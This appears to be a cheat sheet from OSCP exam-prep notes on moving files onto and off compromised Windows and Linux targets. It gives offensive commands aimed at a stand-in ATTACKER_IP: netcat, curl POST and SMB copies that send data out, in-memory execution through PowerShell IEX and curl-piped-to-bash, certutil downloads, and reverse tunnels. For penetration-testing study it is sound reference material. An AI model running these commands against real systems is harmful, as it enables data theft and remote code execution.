// notes/ Shells & File Transfers
📤
File Transfer Cheatsheet
Move files onto and off a target — HTTP, SMB, FTP, base64, certutil.
#file transfer#smb#http
source · airouboss/oscp-prep-notes-2026 · cheat-sheets/file-transfer.md ↗File Transfer
HTTP Servers (Attacker)
Start one of these before serving files:
bash
$python3 -m http.server 80$php -S 0.0.0.0:80$updog -p 80 # pip3 install updog — supports uploadsWindows to Attacker
SMB (most reliable, no AV issues)
bash
$# On attacker$impacket-smbserver share $(pwd) -smb2support -user hacker -password HACKER123!$ $# On Windows$net use \\ATTACKER_IP\share /user:hacker HACKER123!$copy C:\path\to\file.exe \\ATTACKER_IP\share\$net use /d \\ATTACKER_IP\sharePowerShell Base64 (no outbound connections needed)
powershell
$# On Windows — encode$[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\path\to\file.exe")) | Out-File -Encoding ASCII file.b64$ $# On attacker — decode$base64 -d file.b64 > file.exeNetcat
bash
$# On attacker$nc -nlvp 4444 > received_file.exe$ $# On Windows$nc ATTACKER_IP 4444 < C:\path\to\file.exeAttacker to Windows
PowerShell (preferred)
powershell
$# IWR (PowerShell 3.0+)$powershell -c "IWR -Uri http://ATTACKER_IP/file.exe -OutFile C:\temp\file.exe"$ $# In-memory execution$powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/script.ps1')"Certutil
cmd
$certutil -urlcache -f http://ATTACKER_IP/file.exe C:\temp\file.exeSMB
bash
$# On attacker$impacket-smbserver share $(pwd) -smb2support$ $# On Windows$copy \\ATTACKER_IP\share\file.exe C:\temp\file.exeLinux to Attacker
SCP (if SSH available)
bash
$scp /path/to/file user@ATTACKER_IP:/path/to/destinationNetcat
bash
$# On attacker$nc -nlvp 4444 > received_file$ $# On Linux$nc ATTACKER_IP 4444 < /path/to/fileCurl POST
bash
$curl -X POST --data-binary @/path/to/file http://ATTACKER_IP:4444Attacker to Linux
Wget / Curl (preferred)
bash
$wget http://ATTACKER_IP/file -O /tmp/file$curl http://ATTACKER_IP/file -o /tmp/file$ $# In-memory execution$curl http://ATTACKER_IP/script.sh | bashSCP
bash
$scp user@ATTACKER_IP:/path/to/file /tmp/fileNetcat
bash
$# On attacker$nc -nlvp 4444 < file$ $# On Linux$nc ATTACKER_IP 4444 > /tmp/fileTunnels (when direct transfer is blocked)
SSH Reverse Tunnel
bash
$# On target$ssh -R 8080:localhost:80 user@ATTACKER_IP$ $# On attacker$wget http://localhost:8080/fileChisel Reverse Tunnel
bash
$# On attacker$./chisel server -p 8000 --reverse$ $# On target$./chisel client ATTACKER_IP:8000 R:8080:localhost:80$ $# On attacker$wget http://localhost:8080/fileCommon Upload Directories
Windows
code
01C:\Windows\Temp02C:\Temp03C:\Users\Public04C:\Users\<username>\AppData\Local\Temp05C:\inetpub\wwwroot # If IIS06C:\xampp\htdocs # If XAMPPLinux
code
01/tmp02/var/tmp03/dev/shm04/home/<user>05/var/www/html # If web server